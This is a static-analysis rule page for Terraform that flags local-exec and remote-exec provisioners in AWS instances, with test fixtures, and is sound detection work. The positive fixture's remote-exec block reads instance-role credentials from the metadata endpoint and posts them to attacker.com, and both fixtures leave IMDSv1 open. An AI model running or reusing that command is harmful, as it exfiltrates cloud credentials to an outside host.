terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec
Provisioners are a tool of last resort and should be avoided where possible. Provisioner behavior cannot be mapped by Terraform as part of a plan, and execute arbitrary shell commands by design.
Definition
rules:
  - id: aws-provisioner-exec
    # Scope is deliberately narrow: a provisioner is only reported when it
    # sits inside an aws_instance resource ("..." matches any resource name).
    # Provisioners attached to other resource types are not covered here.
    patterns:
      - pattern-inside: |
          resource "aws_instance" "..." {
            ...
          }
      # Both provisioner flavours run shell commands; local-exec on the
      # machine running terraform, remote-exec on the provisioned host.
      - pattern-either:
          - pattern: |
              provisioner "local-exec" {
                ...
              }
          - pattern: |
              provisioner "remote-exec" {
                ...
              }
    message: >-
      Provisioners are a tool of last resort and should be avoided where
      possible. Provisioner behavior cannot be mapped by Terraform as part of a
      plan, and execute arbitrary shell commands by design.
    languages: [terraform]
    severity: WARNING
    metadata:
      category: security
      subcategory: [guardrail]
      confidence: HIGH
      likelihood: HIGH
      impact: MEDIUM
      technology: [terraform]
      owasp:
        - "A03:2021 - Injection"
        - "A01:2017 - Injection"
      cwe:
        - "CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')"
        - "CWE-94: Improper Control of Generation of Code ('Code Injection')"
      vulnerability_class:
        - Code Injection
        - Other
      references:
        - https://developer.hashicorp.com/terraform/language/resources/provisioners/remote-exec
        - https://developer.hashicorp.com/terraform/language/resources/provisioners/local-exec
      license: Commons Clause License Condition v1.0[LGPL-2.1-only]
Examples
aws-provisioner-exec.tf
# Positive fixture: an aws_instance carrying a remote-exec provisioner.
resource "aws_instance" "example" {
  ami                         = "ami-06ca3ca175f37dd66"
  instance_type               = "t2.micro"
  iam_instance_profile        = "tf-testing-role"
  key_name                    = aws_key_pair.this.key_name
  vpc_security_group_ids      = [aws_security_group.example.id]
  associate_public_ip_address = true

  tags = {
    Name = "terraform-testing"
  }

  # http_tokens = "optional" leaves IMDSv1 reachable without a session token;
  # this rule does not check metadata_options, it only reports the provisioner.
  metadata_options {
    http_endpoint               = "enabled"
    http_tokens                 = "optional"
    http_put_response_hop_limit = 10
  }

  # Resource-level connection settings, used by the remote-exec provisioner.
  connection {
    type        = "ssh"
    user        = "ec2-user"
    host        = self.public_ip
    private_key = tls_private_key.this.private_key_openssh
    agent       = false
  }

  # The inline commands illustrate why provisioners are flagged: they run
  # arbitrary shell on the instance, here reading the instance-role
  # credentials over IMDS and sending them off-host.
  # ruleid: aws-provisioner-exec
  provisioner "remote-exec" {
    inline = [
      "sudo yum install ec2-instance-connect -y",
      "curl http://169.254.169.254/latest/meta-data/iam/security-credentials/tf-testing-role > /tmp/awscreds.txt && curl https://attacker.com/creds.php --data-urlencode creds@/tmp/awscreds.txt"
    ]
  }
}
# Negative fixture: the same instance with no provisioner block, so the
# rule has nothing to report here.
resource "aws_instance" "example" {
  ami                         = "ami-06ca3ca175f37dd66" # make sure to update this to a valid AMI ID
  instance_type               = "t2.micro"
  iam_instance_profile        = "tf-testing-role"
  key_name                    = aws_key_pair.this.key_name
  vpc_security_group_ids      = [aws_security_group.example.id]
  associate_public_ip_address = true

  tags = {
    Name = "terraform-testing"
  }

  # Unchanged from the positive case; IMDSv1 remains enabled here as well,
  # which is outside what this rule checks.
  metadata_options {
    http_endpoint               = "enabled"
    http_tokens                 = "optional"
    http_put_response_hop_limit = 10
  }

  connection {
    type        = "ssh"
    user        = "ec2-user"
    host        = self.public_ip
    private_key = tls_private_key.this.private_key_openssh
    agent       = false
  }
}